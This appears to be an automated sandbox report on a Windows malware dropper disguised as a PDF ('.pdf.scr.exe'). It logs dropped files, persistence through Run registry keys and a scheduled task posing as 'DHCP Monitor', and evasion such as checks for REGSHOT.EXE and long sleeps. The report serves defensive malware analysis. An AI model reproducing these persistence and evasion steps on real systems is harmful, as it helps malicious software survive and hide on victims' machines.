      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile created: C:\Users\user\AppData\Local\Temp\Folder10_51\__tmp_rar_sfx_access_check_3874750
      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeFile created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeFile created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

      Boot Survival

      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chrome
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeFile opened: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | delete
      Source: Possible double extension: pdf.scrStatic PE information: 004349256789197.pdf.scr.exe
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeCode function: 6_2_00C325A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5624, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5948, type: MEMORYSTR
      Source: Yara match File source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR
      Source: ihgsvw.exe, 00000006.00000003.299857455.00000000016D8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.332616328.00000000016FD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.315942638.00000000016F4000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.00000000016E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")`
      Source: ihgsvw.exe, 00000021.00000002.486870938.0000000000EDD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476366235.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475601066.0000000000ECE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.478174099.0000000000EDC000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475174310.0000000000E6D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475387940.0000000000EBB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.477979894.0000000000ED8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXESS
      Source: ihgsvw.exe, 00000021.00000003.477385380.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E30000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475550316.0000000000E39000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475281138.0000000000E34000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.448218460.0000000000E28000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.477100320.0000000000E39000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.477315670.0000000000E3B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.447992985.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.475335079.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465173731.0000000001686000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
      Source: ihgsvw.exe, 00000023.00000003.495486843.00000000016B2000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000002.498875275.00000000016B4000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493542771.000000000169D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465173731.0000000001686000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.465501489.0000000001697000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.497141076.00000000016B4000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.494456875.00000000016A8000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000023.00000003.493999375.00000000016A5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN\N`V
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.327029047.000000000179B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334819122.000000000179D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.333726359.000000000179C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.326732376.0000000001786000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.320691747.000000000177C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXEKW
      Source: ihgsvw.exe, 00000015.00000003.382971984.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356852318.0000000000DB6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356400525.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381984041.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.383092560.0000000000DCD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382181894.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381251567.0000000000DC8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")^\
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.323112688.000000000172B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.318182602.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.299923647.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334500241.0000000001730000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.356400525.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386006427.0000000000E00000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
      Source: ihgsvw.exe, 00000006.00000003.315942638.0000000001726000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.327029047.000000000179B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000002.334819122.000000000179D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.333726359.000000000179C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.326732376.0000000001786000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000006.00000003.320691747.000000000177C000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXES
      Source: ihgsvw.exe, 00000015.00000003.383734271.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.380904548.0000000000DF6000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382361308.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.381716379.0000000000DFB000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000002.386242165.0000000000E6B000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382138122.0000000000E4D000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000015.00000003.382214127.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000002.486870938.0000000000EDD000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.476366235.0000000000ECF000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474700596.0000000000E68000.00000004.00000020.00020000.00000000.sdmp, ihgsvw.exe, 00000021.00000003.474135636.0000000000E68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: REGSHOT.EXE
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5752 Thread sleep count: 63 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5752 Thread sleep count: 85 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5236 Thread sleep count: 61 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5236 Thread sleep count: 79 > 30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 6084 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 4968 Thread sleep count: 31 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 4968 Thread sleep count: 117 > 30
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe TID: 5324 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1756 Thread sleep count: 63 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1756 Thread sleep count: 105 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 3080 Thread sleep count: 64 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 3080 Thread sleep count: 88 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5712 Thread sleep count: 62 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 5712 Thread sleep count: 106 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1752 Thread sleep count: 60 > 30
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe TID: 1752 Thread sleep count: 114 > 30
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Evasive API call chain: GetLocalTime,DecisionNodes
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Thread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Thread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWindow / User API: threadDelayed 9453
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeWindow / User API: foregroundWindowGot 1561
      Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exeAPI coverage: 8.4 %
      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exeAPI call chain: ExitProcess graph end node
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData
      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
